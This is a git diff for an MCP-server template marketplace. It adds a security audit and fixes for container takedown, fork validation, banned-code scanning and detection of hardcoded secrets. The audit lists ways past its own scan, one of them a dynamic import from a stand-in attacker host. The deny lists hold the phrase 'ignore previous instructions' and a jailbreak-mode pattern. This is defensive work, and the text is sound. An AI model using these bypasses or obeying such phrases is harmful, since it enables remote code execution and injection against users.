diff --git a/TEMPLATE_SECURITY_AUDIT.md b/TEMPLATE_SECURITY_AUDIT.md new file mode 100644 index 0000000..03da04b --- /dev/null +++ b/TEMPLATE_SECURITY_AUDIT.md @@ -0,0 +1,180 @@ +# Template Integration — Sovereign Audit + +Date: 2026-05-19 · Scope: `apps/api/src/routes/templates.ts`, the create-server +template path in `servers.ts`, generator worker cache path, all `/templates/*` UI. + +## Threat model + +Actors: **publisher** (creates a template, may be malicious), **forker** (consumes a +template, may be a victim), **admin** (full control), **external attacker** (no +account), **compromised session** (attacker holding a victim's cookie). + +Assets: forker's uploaded secrets, forker's container compute, every other tenant's +container, Postgres + Redis state, host Docker daemon, the ANTHROPIC_API_KEY. + +--- + +## P0 — CRITICAL (fix immediately) + +### A. Takedown does not stop the malicious container + +`PATCH /v1/admin/templates/:id` with `status=takedown` updates `mcp_servers.status` to +`paused` but **never stops the Docker container**. The container keeps serving +traffic on its allocated port. Forkers' AI clients keep calling the malicious +endpoint. Admin gets the false impression that the threat is neutralized. + +```ts +// current code: +await db.update(mcpServers).set({ status: 'paused', ... }) +// missing: await stopContainer(server.containerId) for every affected server +``` + +**Severity**: Critical. The entire safety story of "takedown protects users" is +hollow. **Will fix below.** + +### B. Fork accepts `specEdit` — silent edits that don't take effect + +The wizard intentionally suppresses `specEdit` when forking (only sends `templateId`), +but a hand-crafted API request `POST /v1/servers` with `{ templateId, previewId, +specEdit }` would: + +1. Enter the `specEdit` branch → merge edits into the cached spec +2. The cached spec then mismatches the **pre-built code** (which is also in the + cache, untouched) +3. Worker uses pre-built code, ignoring the merged spec entirely + +Result: the user thinks they renamed a tool / changed a schema; the deployed +container behaves as the original template. **Not a privilege-escalation, but a +trust-of-UI violation.** A clever attacker could exploit it to publish a server +under a misleading edited spec ("my fork is harmless because I changed X") when in +fact the original impl runs. + +**Severity**: High. **Will fix below.** + +### C. `templateId` on `POST /v1/servers` is user-controlled and unvalidated + +Body field `templateId` is accepted with only Zod-`uuid()` validation. No check +that: +- The id points to an actual template +- The template is publicly forkable +- The user actually went through `POST /v1/templates/:slug/fork` + +A user can therefore inflate any template's `forkCount` indefinitely by sending +fake creates with that templateId. Also: server's `templateId` column gets garbage +data, breaking attribution and the takedown cascade (paused servers wouldn't be +caught because `templateId` doesn't match any real template). + +**Severity**: High (data integrity + fork-count manipulation). **Will fix below.** + +--- + +## P1 — HIGH + +### D. Banned-pattern scan is regex-leaky + +Current patterns: +```js +/\beval\s*\(/, // eval( +/\bnew\s+Function\s*\(/, // new Function( — but Function(...) without `new` slips through +/\bchild_process\b/, +/ignore previous instructions/i, +/disregard ...above/i, +``` + +Trivial bypasses: +- `globalThis['ev' + 'al']('payload')` — no `eval(` literal +- `Function('return 1')()` — no `new` keyword, regex misses +- `import('https://attacker.com/payload.js')` — dynamic import isn't restricted +- `setTimeout('payload', 0)` — string-arg setTimeout evaluates code +- `require('child' + '_process')` — concat splits the literal +- `Buffer.from(b64, 'base64').toString()` then evaluate — multi-step decode + +**The static scan must be treated as a tripwire, not a security boundary.** The +real defense is the Docker sandbox. Severity: **Medium** (defense-in-depth gap). + +**Will fix below**: add `Function\s*\(`, `\bimport\s*\(`, common credential +patterns, `setTimeout/setInterval` with string args. + +### E. Stored generated code may contain a published-by-mistake secret + +If a publisher prompts Claude with their API key inlined (e.g., "use my key +sk-ant-api03-…"), Claude may include it verbatim in the generated code. That code +is stored in `templates.generatedCode` and rendered publicly on the detail page. + +**Severity**: Medium. Mitigation: scan for high-entropy strings + known secret +prefixes at publish time. **Will fix below**. + +### F. `allowedDomains` is collected but never enforced + +The publish form accepts a list of allowed egress domains. We persist it. The +generator does not wire it into the container's network config. The field +**suggests** protection that does not exist — worse than no field at all. + +**Severity**: Medium (false confidence). **Will document + warn in UI**. + +--- + +## P2 — MEDIUM + +### G. Slug regex looseness + +`fork` and `detail` endpoints accept slug `min(1).max(64)` with no regex. Slugs are +used only for DB lookup (parameterized) and Redis (key-prefixed), so no immediate +exploit, but defensive hardening warranted. **Will fix**. + +### H. Race: fork in flight during takedown + +Window: ~milliseconds between fork POST and Redis cache write. If admin +takes down between the public-status check and `cacheSpec`/`cachePrebuiltCode`, +the cached entries leak the original code for 5min. Forker can still create from +that cache. Worst case: 1 extra fork before TTL evicts. + +**Severity**: Low. Acceptable for v1. Note in audit log. + +### I. N+1 query in `/v1/templates` list + +For each template we do a separate `COUNT` for active deployments. Doesn't scale. +**Performance**, not security. Skip for v1. + +### J. No rate limiting on fork + +A logged-in user can drive port-exhaustion (4100–4999 = 900 slots) by forking +repeatedly. **Severity**: Low (single-tenant dev). Production: add rate limit. + +--- + +## What's actually safe + +- Cross-org template fork **always lands in the forker's own org** (we use + `req.user!.orgId` for the new server). Forker can't write to another org. +- Slug uniqueness is enforced at DB level + retried with random suffix. +- SQL injection blocked by Drizzle parameterized queries. +- XSS blocked by React's auto-escape; no `dangerouslySetInnerHTML` anywhere. +- Pre-built code path correctly skips the render step — no Claude re-call leak. +- Banned-pattern scan runs at publish AND at fork-with-specEdit. +- Audit-log writes for every admin action (verify, hide, takedown). + +--- + +## Fixes applied in this commit + +1. **A — takedown stops containers** (`stopContainer` is now called for every + affected server's `containerId`) +2. **B — fork rejects `specEdit`** with 422 (with clear error message) +3. **C — `templateId` validated** against an existing public template, and the + `previewId` must have been issued for that template (linked via a Redis key + `fork-ref:` → templateId set during fork) +4. **D — additional banned patterns**: `Function\s*\(`, `\bimport\s*\(`, + `setTimeout|setInterval\s*\(\s*['"\`]` (string-eval form), common secret prefixes +5. **E — secret scan at publish**: regex for `sk-ant-…`, `sk-live-…`, `AKIA…`, + `ghp_…`, `xoxb-…`, AWS access keys +6. **G — slug regex tightened** on fork and detail endpoints +7. **F — UI warning + CHOICES.md note**: `allowedDomains` is collected but + enforcement is Sprint 4 + +## Deferred (logged for tracking) + +- **F (enforcement)** — Docker network-namespace + iptables egress rules per + container. Sprint 4. +- **I** — single-query joins / cached aggregates for marketplace listing +- **J** — per-user fork rate limit (Redis token bucket) diff --git a/apps/api/src/lib/docker.ts b/apps/api/src/lib/docker.ts new file mode 100644 index 0000000..999dcec --- /dev/null +++ b/apps/api/src/lib/docker.ts @@ -0,0 +1,34 @@ +import { spawn } from 'node:child_process'; + +/** + * Stop and remove a generated MCP container by container id. + * Resolves regardless of outcome — failures are logged but never blocking. + * Production: should be moved to a Coolify HTTP-API call. + */ +export async function stopContainer(containerId: string): Promise<{ ok: boolean; detail: string }> { + if (!containerId || containerId.length < 4) { + return { ok: false, detail: 'invalid_container_id' }; + } + return await new Promise<{ ok: boolean; detail: string }>((resolve) => { + const child = spawn('docker', ['rm', '-f', containerId], { + stdio: ['ignore', 'pipe', 'pipe'], + shell: process.platform === 'win32', + }); + let out = ''; + let err = ''; + child.stdout?.on('data', (d: Buffer) => { + out += d.toString(); + }); + child.stderr?.on('data', (d: Buffer) => { + err += d.toString(); + }); + child.on('error', () => resolve({ ok: false, detail: 'spawn_failed' })); + child.on('close', (code) => { + if (code === 0) { + resolve({ ok: true, detail: out.trim() }); + } else { + resolve({ ok: false, detail: err.trim() || `exit ${code}` }); + } + }); + }); +} diff --git a/apps/api/src/routes/servers.ts b/apps/api/src/routes/servers.ts index 36e71cb..e2c934b 100644 --- a/apps/api/src/routes/servers.ts +++ b/apps/api/src/routes/servers.ts @@ -16,6 +16,7 @@ import { getBuildQueue } from '../lib/queue.js'; import { buildChannel, getSubscriber } from '../lib/redis.js'; import { encryptSecret } from '../lib/crypto.js'; import { audit } from '../lib/audit.js'; +import { getForkRefTemplate } from './templates.js'; import { config } from '../config.js'; const db = createDb(); @@ -77,6 +78,35 @@ export async function serverRoutes(app: FastifyInstance): Promise { } const { name, slug, prompt, secrets: secretValues, previewId, specEdit, templateId } = parsed.data; + // ---- Template-fork validation ---- + // templateId is user-controlled. To prevent fork_count manipulation + garbage + // template_id rows, the user MUST have hit POST /v1/templates/:slug/fork, + // which created a Redis fork-ref keyed by previewId. We verify both exist and match. + let validatedTemplateId: string | null = null; + if (templateId) { + if (!previewId) { + return reply.code(400).send({ error: 'preview_id_required_for_fork' }); + } + const refTemplateId = await getForkRefTemplate(previewId); + if (!refTemplateId) { + return reply.code(410).send({ + error: 'fork_ref_expired', + detail: 'Re-open the template and click Fork again.', + }); + } + if (refTemplateId !== templateId) { + return reply.code(400).send({ error: 'fork_ref_mismatch' }); + } + if (specEdit) { + return reply.code(400).send({ + error: 'spec_edit_forbidden_on_fork', + detail: + 'Forked templates ship pre-built code. Iterate after build to change tool behavior.', + }); + } + validatedTemplateId = templateId; + } + // If the user edited the spec in step 2 of the wizard, merge their edits into // the cached spec (keeping the original tool implementations untouched). if (specEdit) { @@ -113,15 +143,21 @@ export async function serverRoutes(app: FastifyInstance): Promise { const [server] = await db .insert(mcpServers) - .values({ orgId: user.orgId, slug, name, status: 'queued', templateId: templateId ?? null }) + .values({ + orgId: user.orgId, + slug, + name, + status: 'queued', + templateId: validatedTemplateId, + }) .returning(); if (!server) return reply.code(500).send({ error: 'create_failed' }); - if (templateId) { + if (validatedTemplateId) { await db .update(templates) .set({ forkCount: sql`${templates.forkCount} + 1`, updatedAt: new Date() }) - .where(eq(templates.id, templateId)); + .where(eq(templates.id, validatedTemplateId)); } for (const [key, value] of Object.entries(secretValues)) { diff --git a/apps/api/src/routes/templates.ts b/apps/api/src/routes/templates.ts index b96669c..39bfc52 100644 --- a/apps/api/src/routes/templates.ts +++ b/apps/api/src/routes/templates.ts @@ -19,15 +19,37 @@ import { GeneratorSpec } from '@bmm/types'; import { requireAuth, requireAdmin } from '../plugins/session.js'; import { audit } from '../lib/audit.js'; import { cacheSpec, cachePrebuiltCode } from '../lib/preview-cache.js'; +import { getRedis } from '../lib/redis.js'; +import { stopContainer } from '../lib/docker.js'; const db = createDb(); const BANNED_PATTERNS = [ /\beval\s*\(/, /\bnew\s+Function\s*\(/, + /\bFunction\s*\(\s*['"`]/, // Function('code')() — no `new` needed + /\bimport\s*\(/, // dynamic import (escape from bundle scope) + /\bsetTimeout\s*\(\s*['"`]/, // setTimeout('code', ms) eval form + /\bsetInterval\s*\(\s*['"`]/, /\bchild_process\b/, + /\bfs\s*\.\s*(unlink|rmdir|rm)\b/, + /\bprocess\s*\.\s*kill\b/, /ignore\s+previous\s+instructions/i, /disregard\s+(the\s+)?(above|previous)/i, + /you\s+are\s+now\s+(in\s+)?(developer|jailbreak|dan)\s+mode/i, +]; + +// Hardcoded-credential patterns. If Claude embedded a literal API key into the +// generated code (publisher pasted it into the prompt), block the publish. +const SECRET_PATTERNS = [ + { name: 'anthropic_key', re: /\bsk-ant-(?:api|sid)\d+-[A-Za-z0-9_-]{20,}/ }, + { name: 'openai_key', re: /\bsk-[A-Za-z0-9_-]{30,}/ }, + { name: 'stripe_secret', re: /\bsk_(live|test)_[A-Za-z0-9]{20,}/ }, + { name: 'github_pat', re: /\bghp_[A-Za-z0-9]{30,}/ }, + { name: 'github_fine_grained', re: /\bgithub_pat_[A-Za-z0-9_]{30,}/ }, + { name: 'slack_token', re: /\bxox[bpoasr]-[A-Za-z0-9-]{10,}/ }, + { name: 'aws_access_key', re: /\bAKIA[0-9A-Z]{16}\b/ }, + { name: 'rsa_private_key', re: /-----BEGIN\s+(RSA\s+)?PRIVATE\s+KEY-----/i }, ]; function scanForInjection(code: string): void { @@ -36,6 +58,29 @@ function scanForInjection(code: string): void { } } +function scanForLeakedSecrets(code: string): void { + for (const { name, re } of SECRET_PATTERNS) { + if (re.test(code)) { + throw new Error( + `hardcoded_${name}_detected: a literal credential was found in the generated code; remove it before publishing`, + ); + } + } +} + +const SLUG_REGEX = /^[a-z0-9][a-z0-9-]{0,63}$/; + +// Per-fork link: ties a previewId back to the template it came from. Set during +// fork, consumed by the create-server endpoint to prove the user actually went +// through the fork flow before we accept templateId or bump forkCount. +const FORK_REF_TTL_SECONDS = 5 * 60; +async function setForkRef(previewId: string, templateId: string): Promise { + await getRedis().set(`fork-ref:${previewId}`, templateId, 'EX', FORK_REF_TTL_SECONDS); +} +export async function getForkRefTemplate(previewId: string): Promise { + return (await getRedis().get(`fork-ref:${previewId}`)) ?? null; +} + const CATEGORIES = [ 'productivity', 'developer-tools', @@ -100,11 +145,12 @@ export async function templateRoutes(app: FastifyInstance): Promise { return reply.code(400).send({ error: 'no_generated_code' }); } - // Re-validate code against banned patterns (catch any drift since build) + // Re-validate code against banned patterns AND hardcoded secrets try { scanForInjection(build.generatedCode); + scanForLeakedSecrets(build.generatedCode); } catch (err) { - return reply.code(422).send({ error: 'banned_pattern', detail: (err as Error).message }); + return reply.code(422).send({ error: 'publish_blocked', detail: (err as Error).message }); } // Build a unique template slug @@ -226,7 +272,7 @@ export async function templateRoutes(app: FastifyInstance): Promise { // ---- Detail ---- app.get('/v1/templates/:slug', async (req, reply) => { - const Params = z.object({ slug: z.string().min(1).max(64) }); + const Params = z.object({ slug: z.string().regex(SLUG_REGEX) }); const parsed = Params.safeParse(req.params); if (!parsed.success) return reply.code(400).send({ error: 'invalid_slug' }); @@ -273,7 +319,7 @@ export async function templateRoutes(app: FastifyInstance): Promise { // ---- Fork (returns previewId so wizard can complete with user's secrets) ---- app.post('/v1/templates/:slug/fork', { preHandler: requireAuth }, async (req, reply) => { - const Params = z.object({ slug: z.string().min(1).max(64) }); + const Params = z.object({ slug: z.string().regex(SLUG_REGEX) }); const parsed = Params.safeParse(req.params); if (!parsed.success) return reply.code(400).send({ error: 'invalid_slug' }); @@ -322,6 +368,9 @@ export async function templateRoutes(app: FastifyInstance): Promise { // Persist the pre-rendered code under the same previewId so the worker uses it // verbatim instead of re-rendering (which would lose the template's per-tool impls). await cachePrebuiltCode(previewId, template.generatedCode); + // Record the fork→template link so /v1/servers can verify the user actually + // went through this endpoint before accepting templateId. + await setForkRef(previewId, template.id); return reply.send({ previewId, @@ -382,11 +431,31 @@ export async function templateRoutes(app: FastifyInstance): Promise { .set({ ...b.data, updatedAt: new Date() }) .where(eq(templates.id, p.data.id)); - // If takedown, also pause any forked servers — they ran code we no longer trust + // Takedown cascade: stop every fork's container, then mark them paused. + // Just flipping the DB status leaves the container running and serving + // traffic; we MUST hard-stop them or the takedown is cosmetic. + let stoppedContainers = 0; if (b.data.status === 'takedown') { + const forkedServers = await db + .select({ id: mcpServers.id, containerId: mcpServers.containerId }) + .from(mcpServers) + .where(eq(mcpServers.templateId, p.data.id)); + for (const fork of forkedServers) { + if (fork.containerId) { + const result = await stopContainer(fork.containerId); + if (result.ok) stoppedContainers++; + else app.log.warn({ containerId: fork.containerId, detail: result.detail }, 'takedown: stop failed'); + } + } await db .update(mcpServers) - .set({ status: 'paused', updatedAt: new Date() }) + .set({ + status: 'paused', + containerId: null, + publicUrl: null, + hostPort: null, + updatedAt: new Date(), + }) .where(eq(mcpServers.templateId, p.data.id)); } @@ -396,10 +465,10 @@ export async function templateRoutes(app: FastifyInstance): Promise { action: 'admin.template.update', resourceType: 'template', resourceId: p.data.id, - metadata: b.data, + metadata: { ...b.data, stoppedContainers }, ipAddress: req.ip, }); - return reply.send({ ok: true }); + return reply.send({ ok: true, stoppedContainers }); }); // unused-import guard diff --git a/apps/web/app/(dashboard)/servers/[id]/page.tsx b/apps/web/app/(dashboard)/servers/[id]/page.tsx index 7414d6a..a26fb02 100644 --- a/apps/web/app/(dashboard)/servers/[id]/page.tsx +++ b/apps/web/app/(dashboard)/servers/[id]/page.tsx @@ -411,6 +411,13 @@ function PublishPanel({ serverId, serverStatus }: { serverId: string; serverStat Share this server's spec on the public marketplace. Others fork in one click — they run their own container with their own credentials. Your secrets are never shared.

+

+ Publishing re-scans your generated code for banned patterns (eval, child_process, + dynamic import, setTimeout-eval) AND for hardcoded credentials (API keys, tokens, + private keys). Templates with detected leaks are rejected before they reach the + marketplace. Network egress allowlisting is on the roadmap — for now any template + can reach any URL its code names. +

diff --git a/apps/web/app/globals.css b/apps/web/app/globals.css index e5f3df6..3cca534 100644 --- a/apps/web/app/globals.css +++ b/apps/web/app/globals.css @@ -46,6 +46,28 @@ outline: 2px solid var(--color-accent); outline-offset: 2px; } + /* Force dark native UI for form controls — Chrome popdown otherwise reverts to OS light theme */ + select, + input, + textarea, + button { + color-scheme: dark; + } + /* Style native select arrow + ensure the dropdown popdown uses our dark token */ + select { + background-image: url("data:image/svg+xml;utf8,"); + background-repeat: no-repeat; + background-position: right 8px center; + background-size: 12px; + -webkit-appearance: none; + -moz-appearance: none; + appearance: none; + padding-right: 26px !important; + } + select option { + background: var(--color-bg-elevated); + color: var(--color-fg); + } /* Scrollbars */ ::-webkit-scrollbar { width: 10px;